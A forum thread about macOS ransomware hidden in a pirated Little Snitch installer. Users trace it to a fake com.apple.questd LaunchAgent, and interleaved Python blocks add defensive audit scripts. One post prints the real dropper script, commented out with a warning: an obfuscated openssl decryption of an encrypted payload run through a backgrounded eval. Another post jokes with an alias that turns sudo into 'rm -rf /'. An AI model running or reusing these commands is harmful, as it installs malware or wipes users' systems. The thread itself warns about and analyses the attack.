Ransomware on OSx 10.12 (sierra)

Discussion in 'Mac / Hackintosh' started by Denshin, Jun 28, 2020.

  1. SmokerNzt

    SmokerNzt Rock Star

    Joined:
    Mar 2, 2013
    Messages:
    527
    Likes Received:
    320
    Always use Pacifist to check the dmg file, because I saw new attacks used by hackers: they put an install file and a folder called .hidden,
    and the install file is linked to a command file.
    Check the /tmp/ folder to see whether there is nothing hidden,
    but before that, type in Terminal:
    HTML:
    defaults write com.apple.finder AppleShowAllFiles TRUE
    HTML:
    killall Finder
    After you finish, to hide them again type in Terminal:
    HTML:
    defaults write com.apple.finder AppleShowAllFiles FALSE
    HTML:
    killall Finder
     
    Last edited: Jul 1, 2020
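The check described in the post above (a visible install entry that is really a link into a .hidden folder holding a .command script) can be automated instead of done by eye in Finder. The script below is an added example, not SmokerNzt's code or anything from the thread: point it at a folder you copied out of a mounted dmg and it lists hidden entries, .command files and symlinks that lead to either. `build_sample()` constructs a throwaway layout in that shape so the script runs offline; the file names in it are made up.

```python
import os
import tempfile
from pathlib import Path


def audit_install_dir(root):
    """Walk an unpacked installer tree and return sorted (kind, path) findings.

    kinds: "hidden"            a file or folder whose name starts with "."
           "command-file"      a *.command script (double-clickable shell script)
           "symlink-to-script" a symlink whose target is a *.command or a hidden path
    Symlinks are not followed, so a link pointing outside the tree is reported, not walked.
    """
    root = Path(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            entry = Path(dirpath) / name
            rel = entry.relative_to(root).as_posix()
            if name.startswith("."):
                findings.append(("hidden", rel))
            if entry.is_symlink():
                target = os.readlink(entry)
                if target.endswith(".command") or any(
                    part.startswith(".") for part in Path(target).parts
                ):
                    findings.append(("symlink-to-script", f"{rel} -> {target}"))
            elif name.endswith(".command"):
                findings.append(("command-file", rel))
    return sorted(findings)


def build_sample():
    """Create a constructed installer layout (not a real dmg) mirroring the pattern
    described in the post: a visible 'Install' entry that is really a link into a
    .hidden folder holding a .command script. Returns the temporary root path."""
    root = Path(tempfile.mkdtemp(prefix="dmg_audit_"))
    (root / "README.txt").write_text("Drag the plug-in to your Plug-Ins folder.\n")
    hidden = root / ".hidden"
    hidden.mkdir()
    (hidden / "install.command").write_text("#!/bin/bash\necho placeholder\n")
    os.symlink(".hidden/install.command", root / "Install")
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample()
    for kind, path in audit_install_dir(target):
        print(f"{kind:18} {path}")
```

Run it as `python3 audit_dmg.py /path/to/copied/dmg/contents`; with no argument it audits the constructed sample. Because symlinks are reported rather than followed, a link pointing at /tmp or at a hidden folder shows up as a finding instead of silently pulling that location into the walk.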
  2. Cube Sixty-Three

    Cube Sixty-Three Kapellmeister

    Joined:
    Mar 30, 2020
    Messages:
    153
    Likes Received:
    51
    I'm sorry the Read_Me_Now.txt file is corrupt, my bad! Can I just inbox you my PayPal? You've 30 mins left...

     
  3. Denshin

    Denshin Member

    Joined:
    Jan 3, 2020
    Messages:
    17
    Likes Received:
    8
    Hey everyone,

    Here's an extra piece of information I found out since the Ransomware went public.

    Before I realised I had ransomware, as I mentioned in my previous post, my computer was running slow and showing high CPU usage. That's when I looked at the LaunchDaemons and LaunchAgents to see what was running in the background that wasn't showing in Activity Monitor.

    I left all the Apple Daemons alone, but in the LaunchAgents folder, there were two files. One relating to Roland Cloud, and one named com.apple.questd

    To check if one of these two was causing problems, I took them out of the LaunchAgents folder and put them some place else.

    After that, I found out about the LittleSnitchHelper thing in my console, so I launched a LittleSnitch Uninstaller that somehow got rid of the LittleSnitch Helper, and everything was fine again.

    A few days later, while talking to @Creme, he mentioned that as the problem came from LittleSnitch, I should probably put the LaunchAgents back into the folder to avoid more issues, so I put both the Roland Cloud file and the com.apple.questd back where they were...

    As you probably guessed, a few minutes after that, I got the ransomware pop-up window.

    com.apple.questd IS THE RANSOMWARE !

    By removing it as soon as my computer started acting up, I basically stopped it in its tracks and didn't leave it enough time to finish what it had to do... and by putting it back in, I shot myself in the foot...

    I had it ! Right in the palm of my hand...
     
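Denshin's account above comes down to one triage step: look in the LaunchAgents folder for an entry that should not be there. A com.apple.* label sitting in a per-user LaunchAgents folder is exactly that kind of entry, since on a stock system Apple's own agents live under /System/Library/LaunchAgents. The script below is an added example, not Denshin's procedure or anything from the thread: it parses every plist in a LaunchAgents folder with the standard library and flags Apple-looking labels in a user folder, programs that live in dot-directories or temp directories, and RunAtLoad+KeepAlive persistence. The two sample plists it writes are constructed; the program path for the questd-shaped entry is a placeholder, not the real malware path.

```python
import plistlib
import tempfile
from pathlib import Path

# Constructed sample plists (not copied from the thread): a vendor helper that looks
# like a normal third-party agent, and an entry shaped like the com.apple.questd
# agent found in the LaunchAgents folder. The program path is a placeholder.
SAMPLE_PLISTS = {
    "com.example.vendorhelper.plist": {
        "Label": "com.example.vendorhelper",
        "ProgramArguments": ["/Applications/VendorApp.app/Contents/MacOS/helper", "--agent"],
        "RunAtLoad": True,
    },
    "com.apple.questd.plist": {
        "Label": "com.apple.questd",
        "ProgramArguments": ["/Users/demo/Library/.questd/com.apple.questd"],
        "RunAtLoad": True,
        "KeepAlive": True,
    },
}

TEMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/")


def audit_launch_agents(directory, per_user=True):
    """Return {label: [flags]} for every suspicious plist in a LaunchAgents folder.

    Flags:
      apple-label-in-user-dir  a com.apple.* label in a per-user LaunchAgents folder;
                               Apple's own agents ship under /System/Library, not ~/Library
      hidden-or-temp-program   the program lives in a dot-directory or a temp directory
      persistent               RunAtLoad plus KeepAlive, so launchd restarts it when killed
    """
    findings = {}
    for plist_path in sorted(Path(directory).glob("*.plist")):
        with open(plist_path, "rb") as fh:
            data = plistlib.load(fh)
        label = data.get("Label", plist_path.stem)
        program = data.get("Program") or (data.get("ProgramArguments") or [""])[0]
        flags = []
        if per_user and label.startswith("com.apple."):
            flags.append("apple-label-in-user-dir")
        if program.startswith(TEMP_PREFIXES) or any(p.startswith(".") for p in Path(program).parts):
            flags.append("hidden-or-temp-program")
        if data.get("RunAtLoad") and data.get("KeepAlive"):
            flags.append("persistent")
        if flags:
            findings[label] = flags
    return findings


def write_sample_dir():
    """Write SAMPLE_PLISTS into a fresh temporary folder and return its path."""
    directory = Path(tempfile.mkdtemp(prefix="launchagents_"))
    for name, content in SAMPLE_PLISTS.items():
        with open(directory / name, "wb") as fh:
            plistlib.dump(content, fh)
    return directory


if __name__ == "__main__":
    # Audit the real per-user folder when it exists (macOS), otherwise the sample.
    real = Path.home() / "Library" / "LaunchAgents"
    target = real if real.is_dir() else write_sample_dir()
    print(f"auditing {target}")
    for label, flags in audit_launch_agents(target).items():
        print(f"{label}: {', '.join(flags)}")
```

Moving a flagged plist out of the folder, as Denshin did, only stops it loading at the next login; `launchctl unload <plist>` stops the running job as well. Keep the moved plist for later analysis rather than deleting it, since the Label and ProgramArguments are what you will need to find the binary it pointed at.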
  4. Delay

    Delay Guest

  5. SmokerNzt

    SmokerNzt Rock Star

    Joined:
    Mar 2, 2013
    Messages:
    527
    Likes Received:
    320
    Here I made a video showing you how the hackers use this ransomware to decrypt all files!
    This will help you next time: when you open a dmg, always check it before you open it!


    Here is the bash script which the hackers are using; I added the # to the file.
    Warning: do not type this into Terminal!!!!!!
    HTML:
    #!/bin/bash
    #G="a";F="c";Q="d";H="e";V="l";Z="m";X="n";T="o";J="p";K="s";
    #export appDir=$(cd "$(dirname "$0")"; pwd -P)
    #export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
    #export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
    #export archive="$(echo $binFile | rev)"
    #export commandArgs='U2FsdGVkX19vyEzWKun2ye/4a4OuXhiZKbW4byjk0CQlyXCd31RaYDBc6RM1c/UkxakqNTQlnBnBPuSd0lwh9Jq67M/2hexDWK6m6AYEdBNy9bveTJGQW19Ad/5Wso9L1m0JMBuI3Ao8sKdy2kC/Gqe5i15fdq/tpMTJ/SBrRBXT75ge9mTNwDCV1biYaxRFBNTUCvPhwtTb69cjO7eeKAP8SmlIjhM5ZeqsksXt2zjqMsuKg92VcYNPMKrcdhzJO2TQLWz1emOoz1ZB8Os6s7bTih/xfaJ5C9vJt378R8wPqMGCM/Jd3FL3gQ6/kFqJ'
    #decryptedFommand="$(echo -e "$commandArgs" | ${T}${J}${H}${X}${K}${K}${V} ${H}${X}${F} -${G}${H}${K}-256-cbc -${Q} -A -b${G}${K}${H}64 -${J}${G}${K}${K} "${J}${G}${K}${K}:$archive")"
    #nohup /bin/bash -c "eval \"$decryptedFommand\"" >/dev/null 2>&1 &
    #killall Terminal 
     
    Last edited: Jul 1, 2020
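The commented-out script above has a recognisable shape even without decrypting its payload: single-letter variables that spell a command name one character at a time, `${X}${Y}` concatenation to assemble it, a long base64 literal, a staging directory under /tmp, an `eval` pushed into the background with `nohup`, and a `killall Terminal` to close the window the user launched it from. The script below is an added example, not code from the thread or from any vendor: it scores a shell script against those signals so a .command file found inside an installer can be triaged before anyone runs it. Both samples in it are constructed; the suspicious one copies only the shape of the posted dropper (its "blob" is just the letter A repeated and its assembled command is `echo`).

```python
import re

# Constructed samples (not the script from the thread). The suspicious one copies only the
# shape of the posted dropper: single-letter variables spelling a command, ${X}${Y}
# concatenation, a long base64 literal, a staging dir under /tmp, a backgrounded eval,
# and a killall of Terminal. The blob is 'A' repeated; the assembled command is 'echo'.
SUSPICIOUS_SAMPLE = "\n".join([
    "#!/bin/bash",
    'A="e";B="c";C="h";D="o";E="l";F="s";',
    'export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"',
    "export blob='" + "A" * 96 + "'",
    'cmd="$(${A}${B}${C}${D} hello)"',
    'nohup /bin/bash -c "eval \\"$cmd\\"" >/dev/null 2>&1 &',
    "killall Terminal",
])

BENIGN_SAMPLE = "\n".join([
    "#!/bin/bash",
    "# uninstall helper: remove the vendor launch agent and its plist",
    'launchctl unload "$HOME/Library/LaunchAgents/com.example.vendorhelper.plist"',
    'rm -f "$HOME/Library/LaunchAgents/com.example.vendorhelper.plist"',
    'echo "done"',
])


def defang(script):
    """Strip one leading '#' per line (except the shebang) so a commented-out copy,
    like the one posted in the thread, is scanned the same as the live script."""
    lines = []
    for line in script.splitlines():
        if line.startswith("#") and not line.startswith("#!"):
            line = line[1:]
        lines.append(line)
    return "\n".join(lines)


def letter_variable_spelling(s):
    # four or more X="y" single-character assignments: command names spelled letter by letter
    return len(re.findall(r'\b[A-Za-z]="[a-z0-9]";', s)) >= 4


def brace_concatenated_command(s):
    return re.search(r"\$\{[A-Za-z]\}\$\{[A-Za-z]\}", s) is not None


def long_base64_literal(s):
    return re.search(r"'[A-Za-z0-9+/=]{80,}'", s) is not None


def background_eval(s):
    return "nohup" in s and re.search(r"\beval\b", s) is not None


def kills_terminal(s):
    return re.search(r"\bkillall\s+Terminal\b", s) is not None


def temp_staging(s):
    return re.search(r"\bmktemp\s+-d\s+/tmp/", s) is not None


SIGNALS = [
    ("letter-variable-spelling", letter_variable_spelling),
    ("brace-concatenated-command", brace_concatenated_command),
    ("long-base64-literal", long_base64_literal),
    ("background-eval", background_eval),
    ("kills-terminal", kills_terminal),
    ("temp-staging", temp_staging),
]


def analyze(script):
    """Return the names of the signals that fire, in SIGNALS order."""
    text = defang(script)
    return [name for name, check in SIGNALS if check(text)]


def is_suspicious(script, threshold=3):
    """Three independent signals is the cut-off used here; one alone (mktemp, say)
    is common in legitimate installers."""
    return len(analyze(script)) >= threshold


if __name__ == "__main__":
    import sys
    script = open(sys.argv[1]).read() if len(sys.argv) > 1 else SUSPICIOUS_SAMPLE
    hits = analyze(script)
    print("suspicious" if is_suspicious(script) else "no strong signals", hits)
```

Run it as `python3 triage_command.py path/to/install.command`. The threshold matters: a vendor uninstaller that uses `mktemp` alone should not be flagged, which is what the benign sample checks, while the posted dropper's shape trips every signal at once. The `defang` step means the thread's commented-out copy can be scanned as it was posted, without restoring it to a runnable state.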
  6. JMOUTTON

    JMOUTTON Audiosexual

    Joined:
    Jan 10, 2016
    Messages:
    1,051
    Likes Received:
    855
    Location:
    Virginia
  7. Haliax

    Haliax Guest

    you could always type: alias sudo='su -c "rm -rf /" '

    (don't type that)
     
  8. Paul Pi

    Paul Pi Audiosexual

    Joined:
    Oct 18, 2016
    Messages:
    714
    Likes Received:
    693
    Location:
    London
    No doubt you already spotted it, but @ 4' 53'' you typo'd FLASE instead of FALSE

    According to Urban Dictionary, FLASE either means:
    1. A Loser; Frail; Weak
    2. Suggests the writer is thinking about flaccid male genitalia.
    3. A type of yeast infection commonly contracted from having sex with skunks and skanks and truth munchers.

    Now I know it's all a bit random, but if we're not careful @Area51 will be along real soon, (s)he-it loves that kinda thing... ;)
     
    Last edited: Jul 1, 2020
  9. CharlieCrizzle

    CharlieCrizzle Kapellmeister

    Joined:
    Sep 10, 2019
    Messages:
    222
    Likes Received:
    46
    So did this start immediately after trying to install Little Snitch, or did it time bomb?
     
  10. Creme

    Creme Kapellmeister

    Joined:
    Sep 20, 2015
    Messages:
    82
    Likes Received:
    45
    Location:
    Somewhere on the table
    I might be wrong, but I don't think so. Denshin actually stopped the process by momentarily moving the com.apple.questd outside of the user LaunchAgents folder. A few days later, seeing his computer was still acting weird, I suggested to him to put this agent back where he found it, which led the agent to finish the process. As he said in a post earlier: "I had it ! Right in the palm of my hand..."
     
    Last edited: Jul 2, 2020
  11. Valnar

    Valnar Rock Star

    Joined:
    Feb 21, 2020
    Messages:
    744
    Likes Received:
    348
    (quoting you so you 100% see this)

    https://www.wired.com/story/new-mac-ransomware-thiefquest-evilquest/

    pls change your passwords ASAP after removing the malware!!!!
     
  12. Creme

    Creme Kapellmeister

    Joined:
    Sep 20, 2015
    Messages:
    82
    Likes Received:
    45
    Location:
    Somewhere on the table
    Well, as it uses a keylogger, if you didn't type any crucial password or credit card number between the time you installed the ransomware and the time you fixed it, you should be fine. But in any case, regularly updating important passwords is always good advice.
     
  13. Denshin

    Denshin Member

    Joined:
    Jan 3, 2020
    Messages:
    17
    Likes Received:
    8
    The LaunchAgent started instantly, like @Creme mentioned; it only got delayed because I removed it from the LaunchAgents folder and restarted my computer, which didn't load it at startup and stopped it from continuing whatever it was supposed to do.
     
  14. PsYAuM

    PsYAuM Ultrasonic

    Joined:
    Jan 17, 2014
    Messages:
    84
    Likes Received:
    20
  15. CharlieCrizzle

    CharlieCrizzle Kapellmeister

    Joined:
    Sep 10, 2019
    Messages:
    222
    Likes Received:
    46
  16. Denshin

    Denshin Member

    Joined:
    Jan 3, 2020
    Messages:
    17
    Likes Received:
    8
    Read my earlier post. Unless something else happened in the meantime, Ableton had nothing to do with it... it seems they just didn't read this very post carefully enough...
     
  17. lasm2000

    lasm2000 Member

    Joined:
    Oct 11, 2019
    Messages:
    14
    Likes Received:
    10
  18. Area51

    Area51 Kapellmeister

    Joined:
    May 3, 2020
    Messages:
    286
    Likes Received:
    43
    I find your male privilege sexist and misogynist. Post closed.
     
  19. CharlieCrizzle

    CharlieCrizzle Kapellmeister

    Joined:
    Sep 10, 2019
    Messages:
    222
    Likes Received:
    46
    I'm referring to the articles posted stating that it was in Ableton. I understand how you personally encountered it.
     
  20. Smoove Grooves

    Smoove Grooves Audiosexual

    Joined:
    Jan 26, 2019
    Messages:
    5,209
    Likes Received:
    1,980
    The articles misunderstood what was written in this very thread!
    The ransomware is in Little Snitch.
     